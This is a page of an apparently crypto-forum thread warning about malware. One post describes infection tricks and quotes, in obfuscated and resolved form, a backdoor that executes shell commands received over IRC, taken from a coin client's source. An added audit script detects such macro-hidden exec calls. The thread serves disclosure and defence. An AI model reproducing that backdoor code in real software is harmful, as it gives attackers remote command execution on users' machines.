Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 15. (Read 704727 times)

full member
Activity: 392
Merit: 100
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
Yeah, I can understand why you are so annoyed about it.
Let's hope that they will work out something soon.
member
Activity: 368
Merit: 10
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information. I think we all must be more careful when we deal with our money. You have inspired me to review my antivirus.
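Added example, not part of the original posts or of the coin's source: a small audit script that expands object-like `#define` aliases before looking for process-execution calls, which is the check that would surface the `CRead` call in the listing quoted above. The `#define` lines in the sample are constructed from the two listings in the post (their exact form in the real source is an assumption), and the function names and the list of flagged calls are this example's own.

```python
import re

# Functions that start a shell or process; an alias for one deserves review.
EXEC_CALLS = {"popen", "_popen", "system", "execl", "execlp", "execv",
              "execvp", "WinExec", "ShellExecuteA", "CreateProcessA"}
# Object-like macros only: "#define NAME replacement"
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)\s+(.+?)\s*$")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

def collect_aliases(source):
    """Map each object-like macro name to its replacement text."""
    matches = (DEFINE_RE.match(line) for line in source.splitlines())
    return {m.group(1): m.group(2) for m in matches if m}

def resolve(name, aliases, limit=8):
    """Follow alias chains (A -> B -> popen) up to a fixed depth."""
    for _ in range(limit):
        if name not in aliases:
            break
        name = aliases[name]
    return name

def find_hidden_exec(source):
    """Return (line_no, written_name, resolved_name) for every call whose
    name is, or expands through macros to, a process-execution function."""
    aliases = collect_aliases(source)
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue  # the definition itself is not a call site
        for m in CALL_RE.finditer(line):
            real = resolve(m.group(1), aliases)
            if real in EXEC_CALLS:
                hits.append((no, m.group(1), real))
    return hits

# Constructed sample: macro definitions inferred from the post's two listings.
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
}
'''

if __name__ == "__main__":
    for no, written, real in find_hidden_exec(SAMPLE):
        print(f"line {no}: {written}() expands to {real}()")
```

A plain text search for `popen` in the call site would miss this, because the name only appears in the macro definition; the script reports the line where the alias is actually invoked.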
newbie
Activity: 131
Merit: 0
OMG

I can't believe this information.
Thank you guys.
I will pass the message across.

Thanks
full member
Activity: 392
Merit: 100
Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money
newbie
Activity: 48
Merit: 0
I have to say, anything at all on the internet that has money involved, one needs to be careful because there are thieves everywhere, even in our local banks. So I will say keep your passkeys very very secured. You might have police at your local banks, but there's no police here. We don't need them here because our security is in our hands.
full member
Activity: 406
Merit: 106
I just received something like this an hour ago.  I was surfing Ebay and laughed when I saw PimpCash.  Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up.  However, for me, it pretended to be my service provider and gave me a number to call.  I confess I did try to call but the ring didn't sound right.  Sounded like an old telephone.  I hung up and rebooted my computer.  Things seem to be ok now.  I ran a quick scan and all seems to be okay.  Is there anything else I should do to check to see if my computer is okay?
full member
Activity: 448
Merit: 100
This sounds really scary, but I guess that where is the money, there are also malversations 
Anyhow, you always need to be careful...

Yeah, I agree. Unfortunately, you cannot trust anyone and should check information twice, and, of course, never give your private data.
full member
Activity: 448
Merit: 100
Could you please post the coin's name and maybe others that you may have found ?
Thank you so much for your information! I have never heard of such things before, and I hope I will never face it. I will share your information with my friends, thanx!
newbie
Activity: 29
Merit: 0
Yup, I’ve been hearing a lot about this lately.
newbie
Activity: 176
Merit: 0
This sounds really scary, but I guess that where is the money, there are also malversations 
Anyhow, you always need to be careful...
newbie
Activity: 104
Merit: 0
Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
newbie
Activity: 10
Merit: 0
I think vpn routers can also help to block malware or attackers.
The safest way to secure your account is to use vpn.
member
Activity: 224
Merit: 11
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
full member
Activity: 406
Merit: 106
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
newbie
Activity: 88
Merit: 0
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?
newbie
Activity: 28
Merit: 0
The more crypto grows the smarter the hackers it attracts.
member
Activity: 224
Merit: 11
Thank you very much for the useful information. I, of course, am very frightened that more and more people are writing that they have lost their means.
newbie
Activity: 4
Merit: 0
I'm spooked, not gonna lie. This is news to me, geez.
newbie
Activity: 112
Merit: 0
Many thanks for alerting us about the dangers of malware. When I started working on my computer, I always reminded myself to be alert to emails, ads ... potentially containing malicious software, malicious code, viruses. Just a careless click, every effort, the money you try to accumulate will fall into the hands of the bad guys.
Although you are very careful, your computer can still be attacked by malware. The software can retrieve your personal information to send to the hacker. Everything that you keep on your computer will be sent to the bad guys. Ideally, you should install a secure and reliable software on your computer. At times, using some manual remedies is unbelievably effective. Wish you always safe.
jr. member
Activity: 143
Merit: 1
Thanks for this information. I have known many things from this thread.